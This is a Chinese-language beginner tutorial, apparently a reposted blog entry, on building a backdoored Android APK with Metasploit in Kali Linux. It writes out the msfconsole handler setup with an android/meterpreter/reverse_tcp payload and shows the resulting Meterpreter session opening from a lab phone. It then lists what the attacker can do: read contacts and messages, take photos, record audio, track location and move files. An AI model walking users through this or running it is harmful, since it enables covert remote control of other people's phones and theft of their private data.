zoukankan      html  css  js  c++  java
  • Kali之Metasploit生成apk后门控制安卓

    扫盲教程,大佬勿喷。

    实验中请更改为你环境的IP。

    生成apk后门

    Kali Linux(Hack):192.168.169.76

    Android(靶机):192.168.169.137

    启动kali,开终端,生成apk后门。仅有9.2k的apk,也是蛮吊

    lhost为kali的ip,lport指定一个端口。

    开metasploit控制台侦听

    root@kali:~# msfconsole
    msf > use exploit/multi/handler
    msf exploit(handler) > set payload android/meterpreter/reverse_tcp #设置payload
    payload => android/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 192.168.169.76 #kali的IP
    lhost => 192.168.169.76
    msf exploit(handler) > set lport 445 #对应刚才设的端口
    lport => 445
    msf exploit(handler) > exploit
     
    [*] Started reverse TCP handler on 192.168.169.76:445
    [*] Starting the payload handler...
    [*] Sending stage (63194 bytes) to 192.168.169.137
    [*] Meterpreter session 1 opened (192.168.169.76:445 -> 192.168.169.137:45552) at 2017-09-28 01:36:01 -0400
    

      

    复制apk出来装到手机上打开后就可以exploit了,会看到会话反弹回来。

    可以看下帮助都有啥操作

    meterpreter > help

    功能示例

    读取联系人,信息,拍照,录音,获取位置信息,上传下载文件等等,还是挺强大的。

    Kali之Metasploit生成apk后门控制安卓Kali之Metasploit生成apk后门控制安卓

    Kali之Metasploit生成apk后门控制安卓

    补充freebuf上的文章:

     
     
  • 相关阅读:
    (OK) [android-x86-6.0-rc1] grub
    /proc/sys/net/ipv4/conf/*/promote_secondaries
    (OK) Ipsysctl tutorial 1.0.4
    Android Netd ndc (Native Daemon Connector)
    Android Wi-Fi — IP forward — ndc — netd
    Android 网络问题
    有哪些 Android 大牛的 blog 值得推荐?
    Android 4.4 Kitkat 使能有线网络 Ethernet
    IP forwarding failure in android 4.0
    (OK) [android-x86-6.0-rc1] /system/etc/init.sh
  • 原文地址:https://www.cnblogs.com/zerlong/p/8430130.html
Copyright © 2011-2022 走看看